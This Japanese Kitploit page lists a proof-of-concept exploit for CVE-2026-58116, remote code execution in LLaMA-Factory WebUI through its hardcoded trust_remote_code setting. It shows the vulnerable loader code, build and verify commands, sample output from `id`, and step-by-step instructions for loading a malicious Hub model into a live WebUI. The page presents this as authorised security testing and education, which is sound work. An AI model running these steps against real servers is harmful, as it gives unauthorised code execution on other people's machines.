Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection — CVE-2026-58116の概念実証エクスプロイト。LLaMA-Factory WebUIにおけるtrust_remote_codeモデルパスインジェクションを介したリモートコード実行を実証します。許可されたセキュリティテスト用のペイロードモデルと検証スクリプトを含みます。 | Kitploit
ツール/GitHubGitHub/hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用CTF論文と研究学習と教育ペイロード開発
GitHub
hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

CVE-2026-58116の概念実証エクスプロイト。LLaMA-Factory WebUIにおけるtrust_remote_codeモデルパスインジェクションを介したリモートコード実行を実証します。許可されたセキュリティテスト用のペイロードモデルと検証スクリプトを含みます。

リポジトリを見る
22ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-58116 — LLaMA-Factory WebUI における trust_remote_code を介した RCE

CVE-2026-58116 (CVSS 9.8 Critical) の概念実証: LLaMA-Factory <= v0.9.5 におけるリモートコード実行。

LLaMA-Factory WebUI は、モデル読み込み時に trust_remote_code=True をハードコードしています(src/llamafactory/webui/chatter.py:139 および runner.py:175,320)。攻撃者が制御する「Model path」フィールドがバリデーションなしで AutoTokenizer.from_pretrained() / AutoModel.from_pretrained() に渡されるため、Hugging Face の transformers ライブラリが悪意のあるモデルリポジトリから任意の Python コードをダウンロードし実行します。

⚠️ 教育目的のみ

この PoC は、許可されたセキュリティテストおよび教育のみを目的としています。含まれているペイロードは意図的に無害であり(id によるホスト偵察結果を表示します)。所有しているシステム、またはテストを許可されたシステムでのみ実行してください。明示的な許可なくインフラに対して悪意のあるペイロードをデプロイしないでください。

内容

root@kitploit:~
.
├── poc-model/
│   ├── config.json          #  auto_map で attackerc modules を宣言
│   ├── configuration_poc.py # ペイロード: config 読み込み時に os.system("id ...") を実行
│   ├── modeling_poc.py      # 最小限のスタブモデルクラス
│   └── __init__.py          # インポート可能なパッケージにする
└── build_and_verify.py      # シンクを単独で構築・検証

シンクの仕組み

transformers は重みをロードする前に config クラスをインスタンス化するため、PoCConfig.__init__ 内のペイロードは config が読み込まれるとすぐに発火します — 重みは必要ありません。これがまさに LLaMA-Factory が src/llamafactory/model/loader.py を通じて到達するパスです:

root@kitploit:~
def _get_init_kwargs(model_args):
    return {"trust_remote_code": model_args.trust_remote_code, ...}   # True (ハードコード)

def load_tokenizer(model_args):
    init_kwargs = _get_init_kwargs(model_args)
    tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)

クイックスタート

ローカルでシンクを検証 (WebUI 不要 — WebUI が破る契約を証明します):

root@kitploit:~
pip install transformers torch
python3 build_and_verify.py

期待される出力 — config の読み込み中にペイロードのバナーが表示されることに注意:

root@kitploit:~
[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
  time      : 2026-07-02T...
  host      : gpu-host-01
  user      : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)

稼働中の LLaMA-Factory WebUI を介したエンドツーエンド:

  1. PoC モデルを Hub にアップロード:
    root@kitploit:~
    huggingface-cli login
    python3 build_and_verify.py --upload your-user/llmfcty-poc
    
  2. 影響を受ける LLaMA-Factory ボードを起動: llamafactory-cli webui
  3. Chat タブを開き、Model path に your-user/llmfcty-poc を設定し、Load Model をクリック。
  4. ペイロードが LLaMA-Factory プロセスとしてサーバー上で実行されます。

参照

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-58116
  • VulnCheck アドバイザリ: https://www.vulncheck.com/advisories/llama-factory-remote-code-execution-via-webui-model-path
  • 元の開示 (h3nrrrych4u): https://gist.github.com/henrrrychau/08d76ec672f42136bbc1449c4f2973f8
ツールをダウンロード